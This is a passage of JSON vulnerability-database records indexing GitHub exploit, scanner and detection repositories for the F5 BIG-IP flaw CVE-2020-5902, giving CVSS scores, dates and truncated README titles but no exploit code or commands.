"AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-04T05:24:15", "description": "# CVE-2020-5902 IoC Detection Tool\n\nThis script is intended to b...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-20T19:10:09", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2022-04-04T00:21:22", "id": "EBF17036-7547-54B5-B0D6-B465FE6C9873", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-21T21:10:50", "description": "# CVE-2020-5902-Scanner\nAutomated F5 Big IP Remote Code Executio...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-09T11:46:23", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2022-07-21T18:26:13", "id": "6A34D376-A589-5117-B34C-668A898CD6F2", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:35:59", "description": "# CVE-2020-5902_RCE_EXP\n\nBlog\uff1a[http://www.svenbeast.com/post/cve...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-06T06:45:21", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-08T03:03:42", "id": "D4308421-E113-5104-8D37-4FB75AE2D7DC", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:38:15", "description": "# CVE-2020-5902 Vulnerability Checker\n\n![N|Solid](https://zdnet1...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-09T14:01:29", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-26T14:48:39", "id": "88373793-9076-5F05-BDBB-635A7E1BD897", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-24T21:55:34", "description": "# f5scan\nF5 BIG IP Scanner for CVE-2020-5902 by bt0\n\nMore inform...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-08T21:57:37", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2022-06-24T19:09:06", "id": "49D58681-03E3-5607-8475-366F990C3706", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-15T21:46:44", "description": "# F5-Big-IP-CVE-2020-5902-mass...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-09T08:34:37", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2022-06-15T19:57:55", "id": "28F1E5F0-F489-559C-A1C3-C14BC0D51B93", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:34:45", "description": "# I am not responsible for any damage caused by thi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-10T21:43:11", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-18T04:08:12", "id": "63D5015A-CD15-54CF-A1CB-67AEEEFFB789", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:34:49", "description": "# CVE-2020-590...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-10T07:49:23", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-10T07:54:22", "id": "EA2EA382-C5B7-54EF-8547-EDDD15EA1B85", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-13T04:20:08", "description": "# Checker CVE-2020-5902\n\n[![Python 3.7](https://img.shields.io/b...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-10T07:00:35", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2022-05-12T17:04:34", "id": "4577EA1C-992F-5AA5-86B6-9749FBDFC45D", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:35:00", "description": "### CVE-2020-5902-fofa-scan\n\n##### \u4ecb\u7ecd\n\nF5 BIG-IP...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-09T07:44:07", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2021-05-21T13:50:04", "id": "EE2763B9-CDEA-5FAF-91CF-8B6902DD2E56", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:35:37", "description": "### CVE-2020-5902-fofa-scan\n\n##### \u4ecb\u7ecd\n\nF5 BIG-IP...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-12T07:49:18", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2021-04-11T14:53:19", "id": "26F1DC1C-5D5D-5D8B-8DDB-890968225F0B", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:36:10", "description": "# checkvulnCVE20205902\nA powershell script to c...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-08T21:50:32", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2021-04-04T00:01:08", "id": "D07D56B4-40BB-511F-B7EA-EF5B1544D876", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:35:35", "description": "# GoF5-CVE-2020-5902\nUtilidad Open-Source para validar la ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-09T06:09:39", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2021-06-26T15:07:50", "id": "5562A10B-A754-5E2C-9FCA-88EA38C98CBD", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-19T01:47:04", "description": "# Readme\nF5 BIG-IP \u4efb\u610f\u6587\u4ef6\u8bfb\u53d6+\u8fdc\u7a0b\u547d\u4ee4\u6267\u884cRCE\n> ```\n> +-------------------...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-08T04:02:07", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2022-07-18T20:15:56", "id": "0FE94331-DF7E-5791-BE22-DD1DF78E5A3C", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:36:48", "description": "# CVE-2020-5902\nProof of Concept for CVE-2020-5902\n\n## Blog Post...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-05T18:29:37", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2020-09-05T23:07:17", "id": "A1FEA8E3-60B5-5828-A65B-98AA56545D78", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-26T05:23:52", "description": "# CVE-2020-5902 (F5 BIG-IP devices)\n\n\n## Summary: \nA Zeek detec...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-28T00:43:14", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2021-10-24T07:15:50", "id": "067A6222-57A8-52E2-887C-CA7ED4D9A4F4", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:36:29", "description": "# Summary\nIn BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 1...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-05T17:01:27", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2022-02-19T13:35:53", "id": "152D4F4D-1599-54AE-9A00-A593A379AE0A", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:57:46", "description": "# f5_scanner\nF5 mass scanner and CVE-2020-5902 checker\n\n# This ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-07T15:17:13", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-08T06:46:15", "id": "B417316F-A794-5234-BC9E-475C438FC35C", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:55:40", "description": "# F5-BIG-IP-CVE-2020-5902-checker\n\nSimple bash script of F5 BIG-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-04T16:36:21", "type": "githubexploit", "title": "Exploit for Path Traversal in F5 Big-Ip Access Policy Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2021-02-11T04:37:56", "id": "E2C6B714-1F75-5584-B0B3-280C3B36C014", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-27T01:59:36", "description": "# CVE-2020-5902\nPython script to exploit F5 Big-IP...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", 